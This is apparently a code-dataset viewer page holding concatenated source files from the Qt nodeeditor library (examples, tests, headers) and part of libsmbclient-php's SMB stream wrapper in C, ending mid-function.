Search is not available for this dataset
content
stringlengths 60
399M
| max_stars_repo_name
stringlengths 6
110
|
---|---|
<|start_filename|>examples/styles/models.cpp<|end_filename|>
#include "models.hpp"
// For some reason CMake could not generate moc-files correctly
// without having a cpp for an QObject from hpp.
<|start_filename|>examples/calculator/Converters.cpp<|end_filename|>
#include "Converters.hpp"
#include <QtGui/QDoubleValidator>
#include "DecimalData.hpp"
#include "IntegerData.hpp"
std::shared_ptr<NodeData>
DecimalToIntegerConverter::
operator()(std::shared_ptr<NodeData> data)
{
auto numberData =
std::dynamic_pointer_cast<DecimalData>(data);
if (numberData)
{
_integer = std::make_shared<IntegerData>(numberData->number());
}
else
{
_integer.reset();
}
return _integer;
}
std::shared_ptr<NodeData>
IntegerToDecimalConverter::
operator()(std::shared_ptr<NodeData> data)
{
auto numberData =
std::dynamic_pointer_cast<IntegerData>(data);
if (numberData)
{
_decimal = std::make_shared<DecimalData>(numberData->number());
}
else
{
_decimal.reset();
}
return _decimal;
}
<|start_filename|>test/src/TestDataModelRegistry.cpp<|end_filename|>
#include <nodes/DataModelRegistry>
#include <catch2/catch.hpp>
#include "StubNodeDataModel.hpp"
using QtNodes::DataModelRegistry;
using QtNodes::NodeData;
using QtNodes::NodeDataModel;
using QtNodes::NodeDataType;
using QtNodes::PortIndex;
using QtNodes::PortType;
namespace
{
class StubModelStaticName : public StubNodeDataModel
{
public:
static QString
Name()
{
return "Name";
}
};
}
TEST_CASE("DataModelRegistry::registerModel", "[interface]")
{
DataModelRegistry registry;
SECTION("stub model")
{
registry.registerModel<StubNodeDataModel>();
auto model = registry.create("name");
CHECK(model->name() == "name");
}
SECTION("stub model with static name")
{
registry.registerModel<StubModelStaticName>();
auto model = registry.create("Name");
CHECK(model->name() == "name");
}
SECTION("From model creator function")
{
SECTION("non-static name()")
{
registry.registerModel([] {
return std::make_unique<StubNodeDataModel>();
});
auto model = registry.create("name");
REQUIRE(model != nullptr);
CHECK(model->name() == "name");
CHECK(dynamic_cast<StubNodeDataModel*>(model.get()));
}
SECTION("static Name()")
{
registry.registerModel([] {
return std::make_unique<StubModelStaticName>();
});
auto model = registry.create("Name");
REQUIRE(model != nullptr);
CHECK(model->name() == "name");
CHECK(dynamic_cast<StubModelStaticName*>(model.get()));
}
}
}
<|start_filename|>include/nodes/internal/QUuidStdHash.hpp<|end_filename|>
#pragma once
#include <functional>
#include <QtCore/QUuid>
#include <QtCore/QVariant>
namespace std
{
template<>
struct hash<QUuid>
{
inline
std::size_t
operator()(QUuid const& uid) const
{
return qHash(uid);
}
};
}
<|start_filename|>test/src/TestFlowScene.cpp<|end_filename|>
#include <nodes/FlowScene>
#include <functional>
#include <memory>
#include <utility>
#include <vector>
#include <nodes/Node>
#include <nodes/NodeDataModel>
#include <catch2/catch.hpp>
#include "ApplicationSetup.hpp"
#include "Stringify.hpp"
#include "StubNodeDataModel.hpp"
using QtNodes::Connection;
using QtNodes::DataModelRegistry;
using QtNodes::FlowScene;
using QtNodes::Node;
using QtNodes::NodeData;
using QtNodes::NodeDataModel;
using QtNodes::NodeDataType;
using QtNodes::PortIndex;
using QtNodes::PortType;
TEST_CASE("FlowScene triggers connections created or deleted", "[gui]")
{
struct MockDataModel : StubNodeDataModel
{
unsigned int nPorts(PortType) const override { return 1; }
void
inputConnectionCreated(Connection const&) override
{
inputCreatedCalledCount++;
}
void
inputConnectionDeleted(Connection const&) override
{
inputDeletedCalledCount++;
}
void
outputConnectionCreated(Connection const&) override
{
outputCreatedCalledCount++;
}
void
outputConnectionDeleted(Connection const&) override
{
outputDeletedCalledCount++;
}
int inputCreatedCalledCount = 0;
int inputDeletedCalledCount = 0;
int outputCreatedCalledCount = 0;
int outputDeletedCalledCount = 0;
void
resetCallCounts()
{
inputCreatedCalledCount = 0;
inputDeletedCalledCount = 0;
outputCreatedCalledCount = 0;
outputDeletedCalledCount = 0;
}
};
auto setup = applicationSetup();
FlowScene scene;
Node& fromNode = scene.createNode(std::make_unique<MockDataModel>());
Node& toNode = scene.createNode(std::make_unique<MockDataModel>());
Node& unrelatedNode = scene.createNode(std::make_unique<MockDataModel>());
auto& fromNgo = fromNode.nodeGraphicsObject();
auto& toNgo = toNode.nodeGraphicsObject();
auto& unrelatedNgo = unrelatedNode.nodeGraphicsObject();
fromNgo.setPos(0, 0);
toNgo.setPos(200, 20);
unrelatedNgo.setPos(-100, -100);
auto& from = dynamic_cast<MockDataModel&>(*fromNode.nodeDataModel());
auto& to = dynamic_cast<MockDataModel&>(*toNode.nodeDataModel());
auto& unrelated = dynamic_cast<MockDataModel&>(*unrelatedNode.nodeDataModel());
SECTION("creating half a connection (not finishing the connection)")
{
auto connection = scene.createConnection(PortType::Out, fromNode, 0);
CHECK(from.inputCreatedCalledCount == 0);
CHECK(from.outputCreatedCalledCount == 0);
CHECK(to.inputCreatedCalledCount == 0);
CHECK(to.outputCreatedCalledCount == 0);
CHECK(unrelated.inputCreatedCalledCount == 0);
CHECK(unrelated.outputCreatedCalledCount == 0);
scene.deleteConnection(*connection);
}
struct Creation
{
std::string name;
std::function<std::shared_ptr<Connection>()> createConnection;
};
Creation sceneCreation{"scene.createConnection",
[&] { return scene.createConnection(toNode, 0, fromNode, 0); }};
Creation partialCreation{"scene.createConnection-by partial", [&] {
auto connection = scene.createConnection(PortType::Out, fromNode, 0);
connection->setNodeToPort(toNode, PortType::In, 0);
return connection;
}};
struct Deletion
{
std::string name;
std::function<void(Connection & connection)> deleteConnection;
};
Deletion sceneDeletion{"scene.deleteConnection",
[&](Connection & c) { scene.deleteConnection(c); }};
Deletion partialDragDeletion{"scene-deleteConnectionByDraggingOff",
[&](Connection & c)
{
PortIndex portIndex = c.getPortIndex(PortType::In);
Node * node = c.getNode(PortType::In);
node->nodeState().getEntries(PortType::In)[portIndex].clear();
c.clearNode(PortType::In);
}};
SECTION("creating a connection")
{
std::vector<Creation> cases({sceneCreation, partialCreation});
for (Creation const& create : cases)
{
SECTION(create.name)
{
auto connection = create.createConnection();
CHECK(from.inputCreatedCalledCount == 0);
CHECK(from.outputCreatedCalledCount == 1);
CHECK(to.inputCreatedCalledCount == 1);
CHECK(to.outputCreatedCalledCount == 0);
CHECK(unrelated.inputCreatedCalledCount == 0);
CHECK(unrelated.outputCreatedCalledCount == 0);
scene.deleteConnection(*connection);
}
}
}
SECTION("deleting a connection")
{
std::vector<Deletion> cases({sceneDeletion, partialDragDeletion});
for (auto const& deletion : cases)
{
SECTION("deletion: " + deletion.name)
{
Connection & connection = *sceneCreation.createConnection();
from.resetCallCounts();
to.resetCallCounts();
deletion.deleteConnection(connection);
// Here the Connection reference becomes dangling
CHECK(from.inputDeletedCalledCount == 0);
CHECK(from.outputDeletedCalledCount == 1);
CHECK(to.inputDeletedCalledCount == 1);
CHECK(to.outputDeletedCalledCount == 0);
CHECK(unrelated.inputDeletedCalledCount == 0);
CHECK(unrelated.outputDeletedCalledCount == 0);
}
}
}
}
TEST_CASE("FlowScene's DataModelRegistry outlives nodes and connections", "[asan][gui]")
{
class MockDataModel : public StubNodeDataModel
{
public:
MockDataModel(int* const& incrementOnDestruction)
: incrementOnDestruction(incrementOnDestruction)
{
}
~MockDataModel()
{
(*incrementOnDestruction)++;
}
// The reference ensures that we point into the memory that would be free'd
// if the DataModelRegistry doesn't outlive this node
int* const& incrementOnDestruction;
};
struct MockDataModelCreator
{
MockDataModelCreator(int* shouldBeAliveWhenAssignedTo)
: shouldBeAliveWhenAssignedTo(shouldBeAliveWhenAssignedTo)
{
}
auto
operator()() const
{
return std::make_unique<MockDataModel>(shouldBeAliveWhenAssignedTo);
}
int* shouldBeAliveWhenAssignedTo;
};
int modelsDestroyed = 0;
// Introduce a new scope, so that modelsDestroyed will be alive even after the
// FlowScene is destroyed.
{
auto setup = applicationSetup();
auto registry = std::make_shared<DataModelRegistry>();
registry->registerModel(MockDataModelCreator(&modelsDestroyed));
modelsDestroyed = 0;
FlowScene scene(std::move(registry));
auto& node = scene.createNode(scene.registry().create("name"));
// On destruction, if this `node` outlives its MockDataModelCreator,
// (if it outlives the DataModelRegistry), then we trigger undefined
// behavior through use-after-free. ASAN will catch that.
}
CHECK(modelsDestroyed == 1);
}
<|start_filename|>include/nodes/internal/Serializable.hpp<|end_filename|>
#pragma once
#include <QtCore/QJsonObject>
namespace QtNodes
{
class Serializable
{
public:
virtual
~Serializable() = default;
virtual
QJsonObject
save() const = 0;
virtual void
restore(QJsonObject const & /*p*/) {}
};
}
<|start_filename|>include/nodes/internal/Compiler.hpp<|end_filename|>
#pragma once
#if \
defined (__MINGW32__) || \
defined (__MINGW64__)
# define NODE_EDITOR_COMPILER "MinGW"
# define NODE_EDITOR_COMPILER_MINGW
#elif \
defined (__GNUC__)
# define NODE_EDITOR_COMPILER "GNU"
# define NODE_EDITOR_COMPILER_GNU
# define NODE_EDITOR_COMPILER_GNU_VERSION_MAJOR __GNUC__
# define NODE_EDITOR_COMPILER_GNU_VERSION_MINOR __GNUC_MINOR__
# define NODE_EDITOR_COMPILER_GNU_VERSION_PATCH __GNUC_PATCHLEVEL__
#elif \
defined (__clang__)
# define NODE_EDITOR_COMPILER "Clang"
# define NODE_EDITOR_COMPILER_CLANG
#elif \
defined (_MSC_VER)
# define NODE_EDITOR_COMPILER "Microsoft Visual C++"
# define NODE_EDITOR_COMPILER_MICROSOFT
#elif \
defined (__BORLANDC__)
# define NODE_EDITOR_COMPILER "Borland C++ Builder"
# define NODE_EDITOR_COMPILER_BORLAND
#elif \
defined (__CODEGEARC__)
# define NODE_EDITOR_COMPILER "CodeGear C++ Builder"
# define NODE_EDITOR_COMPILER_CODEGEAR
#elif \
defined (__INTEL_COMPILER) || \
defined (__ICL)
# define NODE_EDITOR_COMPILER "Intel C++"
# define NODE_EDITOR_COMPILER_INTEL
#elif \
defined (__xlC__) || \
defined (__IBMCPP__)
# define NODE_EDITOR_COMPILER "IBM XL C++"
# define NODE_EDITOR_COMPILER_IBM
#elif \
defined (__HP_aCC)
# define NODE_EDITOR_COMPILER "HP aC++"
# define NODE_EDITOR_COMPILER_HP
#elif \
defined (__WATCOMC__)
# define NODE_EDITOR_COMPILER "Watcom C++"
# define NODE_EDITOR_COMPILER_WATCOM
#endif
#ifndef NODE_EDITOR_COMPILER
# error "Current compiler is not supported."
#endif
<|start_filename|>examples/calculator/main.cpp<|end_filename|>
#include <nodes/NodeData>
#include <nodes/FlowScene>
#include <nodes/FlowView>
#include <nodes/ConnectionStyle>
#include <nodes/TypeConverter>
#include <QtWidgets/QApplication>
#include <QtWidgets/QVBoxLayout>
#include <QtWidgets/QMenuBar>
#include <nodes/DataModelRegistry>
#include "NumberSourceDataModel.hpp"
#include "NumberDisplayDataModel.hpp"
#include "AdditionModel.hpp"
#include "SubtractionModel.hpp"
#include "MultiplicationModel.hpp"
#include "DivisionModel.hpp"
#include "ModuloModel.hpp"
#include "Converters.hpp"
using QtNodes::DataModelRegistry;
using QtNodes::FlowScene;
using QtNodes::FlowView;
using QtNodes::ConnectionStyle;
using QtNodes::TypeConverter;
using QtNodes::TypeConverterId;
static std::shared_ptr<DataModelRegistry>
registerDataModels()
{
auto ret = std::make_shared<DataModelRegistry>();
ret->registerModel<NumberSourceDataModel>("Sources");
ret->registerModel<NumberDisplayDataModel>("Displays");
ret->registerModel<AdditionModel>("Operators");
ret->registerModel<SubtractionModel>("Operators");
ret->registerModel<MultiplicationModel>("Operators");
ret->registerModel<DivisionModel>("Operators");
ret->registerModel<ModuloModel>("Operators");
ret->registerTypeConverter(std::make_pair(DecimalData().type(),
IntegerData().type()),
TypeConverter{DecimalToIntegerConverter()});
ret->registerTypeConverter(std::make_pair(IntegerData().type(),
DecimalData().type()),
TypeConverter{IntegerToDecimalConverter()});
return ret;
}
static
void
setStyle()
{
ConnectionStyle::setConnectionStyle(
R"(
{
"ConnectionStyle": {
"ConstructionColor": "gray",
"NormalColor": "black",
"SelectedColor": "gray",
"SelectedHaloColor": "deepskyblue",
"HoveredColor": "deepskyblue",
"LineWidth": 3.0,
"ConstructionLineWidth": 2.0,
"PointDiameter": 10.0,
"UseDataDefinedColors": true
}
}
)");
}
int
main(int argc, char *argv[])
{
QApplication app(argc, argv);
setStyle();
QWidget mainWidget;
auto menuBar = new QMenuBar();
auto saveAction = menuBar->addAction("Save..");
auto loadAction = menuBar->addAction("Load..");
QVBoxLayout *l = new QVBoxLayout(&mainWidget);
l->addWidget(menuBar);
auto scene = new FlowScene(registerDataModels(), &mainWidget);
l->addWidget(new FlowView(scene));
l->setContentsMargins(0, 0, 0, 0);
l->setSpacing(0);
QObject::connect(saveAction, &QAction::triggered,
scene, &FlowScene::save);
QObject::connect(loadAction, &QAction::triggered,
scene, &FlowScene::load);
mainWidget.setWindowTitle("Dataflow tools: simplest calculator");
mainWidget.resize(800, 600);
mainWidget.showNormal();
return app.exec();
}
<|start_filename|>examples/images/ImageLoaderModel.cpp<|end_filename|>
#include "ImageLoaderModel.hpp"
#include <QtCore/QEvent>
#include <QtCore/QDir>
#include <QtWidgets/QFileDialog>
ImageLoaderModel::
ImageLoaderModel()
: _label(new QLabel("Double click to load image"))
{
_label->setAlignment(Qt::AlignVCenter | Qt::AlignHCenter);
QFont f = _label->font();
f.setBold(true);
f.setItalic(true);
_label->setFont(f);
_label->setFixedSize(200, 200);
_label->installEventFilter(this);
}
unsigned int
ImageLoaderModel::
nPorts(PortType portType) const
{
unsigned int result = 1;
switch (portType)
{
case PortType::In:
result = 0;
break;
case PortType::Out:
result = 1;
default:
break;
}
return result;
}
bool
ImageLoaderModel::
eventFilter(QObject *object, QEvent *event)
{
if (object == _label)
{
int w = _label->width();
int h = _label->height();
if (event->type() == QEvent::MouseButtonPress)
{
QString fileName =
QFileDialog::getOpenFileName(nullptr,
tr("Open Image"),
QDir::homePath(),
tr("Image Files (*.png *.jpg *.bmp)"));
_pixmap = QPixmap(fileName);
_label->setPixmap(_pixmap.scaled(w, h, Qt::KeepAspectRatio));
Q_EMIT dataUpdated(0);
return true;
}
else if (event->type() == QEvent::Resize)
{
if (!_pixmap.isNull())
_label->setPixmap(_pixmap.scaled(w, h, Qt::KeepAspectRatio));
}
}
return false;
}
NodeDataType
ImageLoaderModel::
dataType(PortType, PortIndex) const
{
return PixmapData().type();
}
std::shared_ptr<NodeData>
ImageLoaderModel::
outData(PortIndex)
{
return std::make_shared<PixmapData>(_pixmap);
}
<|start_filename|>examples/styles/main.cpp<|end_filename|>
#include <QtWidgets/QApplication>
#include <nodes/NodeData>
#include <nodes/FlowScene>
#include <nodes/FlowView>
#include <nodes/DataModelRegistry>
#include <nodes/NodeStyle>
#include <nodes/FlowViewStyle>
#include <nodes/ConnectionStyle>
#include "models.hpp"
using QtNodes::DataModelRegistry;
using QtNodes::FlowScene;
using QtNodes::FlowView;
using QtNodes::FlowViewStyle;
using QtNodes::NodeStyle;
using QtNodes::ConnectionStyle;
static std::shared_ptr<DataModelRegistry>
registerDataModels()
{
auto ret = std::make_shared<DataModelRegistry>();
ret->registerModel<MyDataModel>();
return ret;
}
static
void
setStyle()
{
FlowViewStyle::setStyle(
R"(
{
"FlowViewStyle": {
"BackgroundColor": [255, 255, 240],
"FineGridColor": [245, 245, 230],
"CoarseGridColor": [235, 235, 220]
}
}
)");
NodeStyle::setNodeStyle(
R"(
{
"NodeStyle": {
"NormalBoundaryColor": "darkgray",
"SelectedBoundaryColor": "deepskyblue",
"GradientColor0": "mintcream",
"GradientColor1": "mintcream",
"GradientColor2": "mintcream",
"GradientColor3": "mintcream",
"ShadowColor": [200, 200, 200],
"FontColor": [10, 10, 10],
"FontColorFaded": [100, 100, 100],
"ConnectionPointColor": "white",
"PenWidth": 2.0,
"HoveredPenWidth": 2.5,
"ConnectionPointDiameter": 10.0,
"Opacity": 1.0
}
}
)");
ConnectionStyle::setConnectionStyle(
R"(
{
"ConnectionStyle": {
"ConstructionColor": "gray",
"NormalColor": "black",
"SelectedColor": "gray",
"SelectedHaloColor": "deepskyblue",
"HoveredColor": "deepskyblue",
"LineWidth": 3.0,
"ConstructionLineWidth": 2.0,
"PointDiameter": 10.0,
"UseDataDefinedColors": false
}
}
)");
}
//------------------------------------------------------------------------------
int
main(int argc, char* argv[])
{
QApplication app(argc, argv);
setStyle();
FlowScene scene(registerDataModels());
FlowView view(&scene);
view.setWindowTitle("Style example");
view.resize(800, 600);
view.show();
return app.exec();
}
<|start_filename|>include/nodes/internal/Export.hpp<|end_filename|>
#pragma once
#include "Compiler.hpp"
#include "OperatingSystem.hpp"
#ifdef NODE_EDITOR_PLATFORM_WINDOWS
# define NODE_EDITOR_EXPORT __declspec(dllexport)
# define NODE_EDITOR_IMPORT __declspec(dllimport)
# define NODE_EDITOR_LOCAL
#elif \
NODE_EDITOR_COMPILER_GNU_VERSION_MAJOR >= 4 || \
defined (NODE_EDITOR_COMPILER_CLANG)
# define NODE_EDITOR_EXPORT __attribute__((visibility("default")))
# define NODE_EDITOR_IMPORT __attribute__((visibility("default")))
# define NODE_EDITOR_LOCAL __attribute__((visibility("hidden")))
#else
# define NODE_EDITOR_EXPORT
# define NODE_EDITOR_IMPORT
# define NODE_EDITOR_LOCAL
#endif
#ifdef __cplusplus
# define NODE_EDITOR_DEMANGLED extern "C"
#else
# define NODE_EDITOR_DEMANGLED
#endif
#if defined (NODE_EDITOR_SHARED) && !defined (NODE_EDITOR_STATIC)
# ifdef NODE_EDITOR_EXPORTS
# define NODE_EDITOR_PUBLIC NODE_EDITOR_EXPORT
# else
# define NODE_EDITOR_PUBLIC NODE_EDITOR_IMPORT
# endif
# define NODE_EDITOR_PRIVATE NODE_EDITOR_LOCAL
#elif !defined (NODE_EDITOR_SHARED) && defined (NODE_EDITOR_STATIC)
# define NODE_EDITOR_PUBLIC
# define NODE_EDITOR_PRIVATE
#elif defined (NODE_EDITOR_SHARED) && defined (NODE_EDITOR_STATIC)
# ifdef NODE_EDITOR_EXPORTS
# error "Cannot build as shared and static simultaneously."
# else
# error "Cannot link against shared and static simultaneously."
# endif
#else
# ifdef NODE_EDITOR_EXPORTS
# error "Choose whether to build as shared or static."
# else
# error "Choose whether to link against shared or static."
# endif
#endif
| FMichelD/nodeeditor |
<|start_filename|>smb_streams.c<|end_filename|>
/* ------------------------------------------------------------------
* This file is part of libsmbclient-php: Samba bindings for PHP.
* Libsmbclient-php is licensed under the BSD 2-clause license:
* ------------------------------------------------------------------
*
* Copyright (c) 2003, <NAME>
* 2009 - 2014, <NAME>
* 2013 - 2015, <NAME>
* 2015, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
* CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* ------------------------------------------------------------------
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "ext/standard/url.h"
#include "ext/standard/info.h"
#include "ext/standard/php_filestat.h"
#include "ext/standard/sha1.h"
#include "php_smbclient.h"
#include <libsmbclient.h>
#define STREAM_DATA_FROM_STREAM() \
php_smb_stream_data *self = (php_smb_stream_data *) stream->abstract;
typedef struct _php_smb_stream_data {
php_smbclient_state *state;
SMBCFILE *handle;
/* pointers cache for multiple call */
smbc_read_fn smbc_read;
smbc_readdir_fn smbc_readdir;
smbc_write_fn smbc_write;
smbc_lseek_fn smbc_lseek;
smbc_ftruncate_fn smbc_ftruncate;
} php_smb_stream_data;
static php_smbclient_state *php_smb_pool_get(php_stream_context *context, const char *url TSRMLS_DC)
{
PHP_SHA1_CTX sha1;
unsigned char hash[20];
struct _php_smb_pool *pool;
/* Create a hash for connection parameter */
PHP_SHA1Init(&sha1);
if (!memcmp(url, "smb://", 6)) {
char *p;
p = strchr(url+6, '/'); // we only want smb://workgroup;user:pass@server/
PHP_SHA1Update(&sha1, (const unsigned char *)url+6, p ? p - url - 6 : strlen(url+6));
}
if (context) {
#if PHP_MAJOR_VERSION >= 7
zval *tmpzval;
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "workgroup"))) {
if (Z_TYPE_P(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_P(tmpzval), Z_STRLEN_P(tmpzval)+1);
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "username"))) {
if (Z_TYPE_P(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_P(tmpzval), Z_STRLEN_P(tmpzval)+1);
}
}
if (NULL != (tmpzval = php_stream_context_get_option(context, "smb", "password"))) {
if (Z_TYPE_P(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_P(tmpzval), Z_STRLEN_P(tmpzval)+1);
}
}
#else
zval **tmpzval;
if (php_stream_context_get_option(context, "smb", "workgroup", &tmpzval) == SUCCESS) {
if (Z_TYPE_PP(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_PP(tmpzval), Z_STRLEN_PP(tmpzval)+1);
}
}
if (php_stream_context_get_option(context, "smb", "username", &tmpzval) == SUCCESS) {
if (Z_TYPE_PP(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_PP(tmpzval), Z_STRLEN_PP(tmpzval)+1);
}
}
if (php_stream_context_get_option(context, "smb", "password", &tmpzval) == SUCCESS) {
if (Z_TYPE_PP(tmpzval) == IS_STRING) {
PHP_SHA1Update(&sha1, (const unsigned char *)Z_STRVAL_PP(tmpzval), Z_STRLEN_PP(tmpzval)+1);
}
}
#endif
}
PHP_SHA1Final(hash, &sha1);
/* Reuse state from pool if exists */
for (pool = SMBCLIENT_G(pool_first); pool; pool = pool->next) {
if (!memcmp(hash, pool->hash, 20)) {
pool->nb++;
return pool->state;
}
}
/* Create a new state and save it in the pool */
pool = emalloc(sizeof(*pool));
memcpy(pool->hash, hash, 20);
pool->nb = 1;
pool->next = SMBCLIENT_G(pool_first);
pool->state = php_smbclient_state_new(context, 1 TSRMLS_CC);
SMBCLIENT_G(pool_first) = pool;
return pool->state;
}
static void php_smb_pool_drop(php_smbclient_state *state TSRMLS_DC)
{
struct _php_smb_pool *pool;
for (pool = SMBCLIENT_G(pool_first); pool; pool = pool->next) {
if (pool->state == state) {
pool->nb--;
return;
}
}
/* Not found (after php_smb_pool_cleanup) so close it */
php_smbclient_state_free(state TSRMLS_CC);
}
void php_smb_pool_cleanup(TSRMLS_D) {
struct _php_smb_pool *pool;
pool = SMBCLIENT_G(pool_first);
while (pool) {
if (!pool->nb) { /* Keep it when still used */
php_smbclient_state_free(pool->state TSRMLS_CC);
}
pool = pool->next;
efree(pool);
}
SMBCLIENT_G(pool_first) = NULL;
}
static int php_smb_ops_close(php_stream *stream, int close_handle TSRMLS_DC)
{
smbc_close_fn smbc_close;
STREAM_DATA_FROM_STREAM();
if (!self) {
return EOF;
}
if (close_handle) {
if (self->handle) {
smbc_close = smbc_getFunctionClose(self->state->ctx);
if (smbc_close) {
smbc_close(self->state->ctx, self->handle);
}
self->handle = NULL;
}
}
php_smb_pool_drop(self->state TSRMLS_CC);
efree(self);
stream->abstract = NULL;
return EOF;
}
static int php_smb_ops_flush(php_stream *stream TSRMLS_DC)
{
return 0;
}
#if PHP_VERSION_ID < 70400
static size_t php_smb_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#else
static ssize_t php_smb_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#endif
{
ssize_t n = 0;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return 0;
}
if (!self->smbc_read) {
self->smbc_read = smbc_getFunctionRead(self->state->ctx);
}
if (self->smbc_read) {
n = self->smbc_read(self->state->ctx, self->handle, buf, count);
}
/* cast count to signed value to avoid possibly negative n being cast to unsigned value */
if (n == 0 || n < (ssize_t)count) {
stream->eof = 1;
}
#if PHP_VERSION_ID < 70400
return (n < 1 ? 0 : (size_t)n);
#else
return n;
#endif
}
#if PHP_VERSION_ID < 70400
static size_t php_smb_ops_write(php_stream *stream, const char *buf, size_t count TSRMLS_DC)
#else
static ssize_t php_smb_ops_write(php_stream *stream, const char *buf, size_t count TSRMLS_DC)
#endif
{
ssize_t len = 0;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return 0;
}
if (!self->smbc_write) {
self->smbc_write = smbc_getFunctionWrite(self->state->ctx);
}
if (self->smbc_write) {
len = self->smbc_write(self->state->ctx, self->handle, buf, count);
}
#if PHP_VERSION_ID < 70400
return (len < 0 ? 0 : (size_t)len);
#else
return len;
#endif
}
static int php_smb_ops_stat(php_stream *stream, php_stream_statbuf *ssb TSRMLS_DC) /* {{{ */
{
smbc_fstat_fn smbc_fstat;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return -1;
}
if ((smbc_fstat = smbc_getFunctionFstat(self->state->ctx)) == NULL) {
return -1;
}
if (smbc_fstat(self->state->ctx, self->handle, &ssb->sb) < 0) {
return -1;
}
return 0;
}
static int php_smb_ops_seek(php_stream *stream, off_t offset, int whence, off_t *newoffset TSRMLS_DC)
{
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return -1;
}
if (!self->smbc_lseek) {
self->smbc_lseek = smbc_getFunctionLseek(self->state->ctx);
}
if (self->smbc_lseek) {
*newoffset = self->smbc_lseek(self->state->ctx, self->handle, offset, whence);
return 0;
}
return -1;
}
static int php_smb_ops_set_option(php_stream *stream, int option, int value, void *ptrparam TSRMLS_DC)
{
size_t newsize;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return PHP_STREAM_OPTION_RETURN_ERR;
}
if (!self->smbc_ftruncate) {
self->smbc_ftruncate = smbc_getFunctionFtruncate(self->state->ctx);
}
if (!self->smbc_ftruncate) {
return PHP_STREAM_OPTION_RETURN_ERR;
}
switch(option) {
case PHP_STREAM_OPTION_TRUNCATE_API:
switch (value) {
case PHP_STREAM_TRUNCATE_SUPPORTED:
return PHP_STREAM_OPTION_RETURN_OK;
case PHP_STREAM_TRUNCATE_SET_SIZE:
newsize = *(size_t*)ptrparam;
if (self->smbc_ftruncate(self->state->ctx, self->handle, newsize) == 0) {
return PHP_STREAM_OPTION_RETURN_OK;
}
return PHP_STREAM_OPTION_RETURN_ERR;
}
}
return PHP_STREAM_OPTION_RETURN_NOTIMPL;
}
static php_stream_ops php_stream_smbio_ops = {
php_smb_ops_write,
php_smb_ops_read,
php_smb_ops_close,
php_smb_ops_flush,
"smb",
php_smb_ops_seek,
NULL, /* cast */
php_smb_ops_stat,
php_smb_ops_set_option
};
static php_stream *
php_stream_smb_opener(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *path,
char *mode,
#else
const char *path,
const char *mode,
#endif
int options,
#if PHP_MAJOR_VERSION < 7
char **opened_path,
#else
zend_string **opened_path,
#endif
php_stream_context *context
STREAMS_DC TSRMLS_DC)
{
php_smbclient_state *state;
int smbflags;
long smbmode = 0666;
smbc_open_fn smbc_open;
SMBCFILE *handle;
php_smb_stream_data *self;
/* Context */
state = php_smb_pool_get(context, path TSRMLS_CC);
if (!state) {
return NULL;
}
/* File */
if (!strcmp(mode, "wb")) {
mode = "w";
} else if (!strcmp(mode, "rb")) {
mode = "r";
}
if (flagstring_to_smbflags(mode, strlen(mode), &smbflags TSRMLS_CC) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
if ((smbc_open = smbc_getFunctionOpen(state->ctx)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
if ((handle = smbc_open(state->ctx, path, smbflags, smbmode)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
self = ecalloc(sizeof(*self), 1);
self->state = state;
self->handle = handle;
return php_stream_alloc(&php_stream_smbio_ops, self, NULL, mode);
}
static int
php_stream_smb_unlink(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_unlink_fn smbc_unlink;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Unlink */
if ((smbc_unlink = smbc_getFunctionUnlink(state->ctx)) == NULL) {
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unlink not supported");
}
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_unlink(state->ctx, url) == 0) {
